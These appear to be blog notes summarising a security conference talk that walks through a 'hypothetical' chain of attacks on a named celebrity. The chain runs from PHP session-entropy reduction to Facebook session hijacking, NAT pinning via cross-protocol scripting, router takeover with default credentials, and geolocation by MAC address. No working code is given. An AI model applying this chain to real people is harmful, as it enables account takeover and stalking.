skip to content W3C SVG

How I Met Your Girlfriend

2011-01-14
  • Samy Kamkar
    • 2010-08-01

    A “hypothetical” story about how to meet a particular hot chick, Anna Faris, by using hacker techniques. Her boyfriend, ‘rsnake’, is a security expert. They are connected on facebook, and samy is connected to rsnake on facebook.

    Facebook uses PHP, probably using default session management (actually, not in reality) via cookies

    At first blush, it looks like cookie contains 160 bits of entropy

    • Client IP address (32 bits), epoch (32 bits), microseconds (32 bits), ‘random’ lcg_value (64 bits)

    Reducing session entropy

    • microseconds
      • Really only 2^20 microsecond values are possible (-12 bits)
    • epoch time
      • facebook webpage sends ajax requests to see who is logged on for chatting (this includes server time). Poll once per second for rsnake’s availability to get epoch within 1 second (-32 bits)
    • Send rsnake a link to personal site that contains nothing fishy, acquiring his IP address (-32 bits)
    • The default PHP PRNG stack is seeded by things like PID and when the webserver started.
      • the webserver start time, if known within 12 days, has 12 bits fixed (-12 bits). And you can try to force servers to restart by sending a lot of requests.
      • the PID is padded to 32 bits but is only 15 bits long (-17 bits). Moreover, if you can get the PID by any means, you actually can remove the other 15 bits of entropy the PID contributes (-15 bits)

    Down to 40 bits of entropy. By guessing microseconds first, can actually reuse that guess to only have to guess at 21 bits of entropy overall.

    Note: PHP 5.3.2 patched these problems. Facebook uses its own PHP stack that was never vulnerable to this technique.

    Now can log in as rsnake.

    Send her a link to a page on his site with malicious javascript.

    NAT will try to act as a firewall by preventing traffic over the wrong ports.

    Cross-Protocol Scripting (XPS)

    • HTTP server can run on any port
    • HTTP, IRC, SMTP both newline-delimited protocols
    • Use javascript on his malicious page to send IRC messages via HTTP to some IRC server of his choosing.
      • IRC server will ignore HTTP headers it can’t interpret, but will react to the embedded IRC request.
      • IRC Direct Client Connection (DCC) – how files get sent over IRC
        • When your NAT sees a DCC request, it just forwards that port straight on.
      • sidenote: browsers smartly block HTTP traffic on non-standard ports, but only checks equality on valid port numbers. samy wants to send traffic on port 6667. So overflow, and send traffic to port 6667+65536.
      • Now all traffic is being forwarded straight to him (NAT Pinning)

    Send a message as rsnake to Anna to a different malicious webpage.

    XXXSS

    • scans her local network to determine her router type
      • iframes on that page try all pages for internal router IPs/pages.
      • logs into the router with default credentials, if necessary.
      • load remote javascript to get MAC address from router.
      • Use Firefox source code and her router’s MAC address to Google Location Services to get her latlon.